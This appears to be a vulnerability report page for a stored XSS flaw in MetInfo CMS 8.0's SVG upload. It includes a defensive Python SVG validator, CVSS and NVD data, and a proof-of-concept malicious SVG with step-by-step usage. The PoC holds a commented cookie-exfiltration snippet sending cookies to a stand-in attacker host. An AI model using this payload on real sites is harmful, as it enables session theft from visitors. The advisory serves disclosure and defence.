Security Vulnerability Report
CVE-2025-60451 CVSS 6.1 MEDIUM

CVE-2025-60451

Published: 2025-10-03 14:15:47
Last Modified: 2025-10-07 15:32:47

Description

A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists due to insufficient validation and sanitization of SVG file uploads in the app\system\include\module\uploadify.class.php component, specifically in the website settings module. This security flaw allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed.
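The validation gap described above can be closed at upload time by refusing SVG files that carry active content. The following is an added example, not MetInfo's code or a vendor patch; the function name, the element denylist and the sample files are constructed for illustration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that run script or embed arbitrary HTML/external documents (illustrative denylist).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
BAD_SCHEMES = ("javascript:", "vbscript:", "data:text/html")

# Constructed sample uploads: one harmless image, one with an embedded script element.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">'
              b'<text x="10" y="50" font-size="20">logo</text></svg>')
SCRIPTED_SVG = (b'<?xml version="1.0" encoding="UTF-8"?>'
                b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>')


def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def svg_upload_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    try:
        text = data.decode("utf-8")  # strict: other encodings could hide markup from the checks
    except UnicodeDecodeError:
        return ["not valid UTF-8"]
    lowered = text.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        return ["DOCTYPE/ENTITY declaration"]  # refused before parsing (entity expansion)
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        if local(el.tag) in ACTIVE_ELEMENTS:
            findings.append(f"active element <{local(el.tag)}>")
        for attr, value in el.attrib.items():
            name = local(attr)
            compact = "".join(value.split()).lower()  # browsers ignore whitespace in URLs
            if name.startswith("on"):
                findings.append(f"event handler attribute {name}")
            elif compact.startswith(BAD_SCHEMES):
                findings.append(f"scriptable URL in {name}")
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("scripted", SCRIPTED_SVG)):
        print(label, svg_upload_findings(sample) or "accepted")
```

A denylist like this is a first gate, not a full sanitizer. Serving user-uploaded SVG with `Content-Disposition: attachment` or a `Content-Security-Policy` that forbids script keeps a missed case from executing in the site's origin.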

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- CVE-2025-60451 PoC - Stored XSS via Malicious SVG Upload in MetInfo CMS 8.0 -->
<!-- Save the following content as 'malicious.svg' and upload via MetInfo CMS webset module -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="500" height="500">
  <script type="text/javascript">
    // PoC for CVE-2025-60451 - Stored XSS in MetInfo CMS 8.0
    // This script executes when the SVG file is rendered in a victim's browser

    // Example 1: Simple alert to demonstrate XSS execution
    alert('XSS Triggered - CVE-2025-60451');

    // Example 2: Cookie exfiltration (for demonstration only)
    // var cookie = document.cookie;
    // var img = new Image();
    // img.src = 'http://attacker-server.com/steal?cookie=' + encodeURIComponent(cookie);

    // Example 3: Using onload event as alternative trigger
  </script>
  <text x="10" y="50" font-size="20">Malicious SVG - CVE-2025-60451</text>
</svg>
<!--
Usage:
1. Save as malicious.svg
2. Login to MetInfo CMS 8.0 backend
3. Navigate to Website Settings module (网站设置)
4. Upload the malicious SVG file via the uploadify component
5. Share the URL of the uploaded SVG with victim
6. When victim opens the SVG URL, JavaScript executes in their browser context
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60451", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.667", "lastModified": "2025-10-07T15:32:47.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists due to insufficient validation and sanitization of SVG file uploads in the app\\system\\include\\module\\uploadify.class.php component, specifically in the website settings module. This security flaw allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-Vulnerability-in-MetInfo-Webset-Module/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}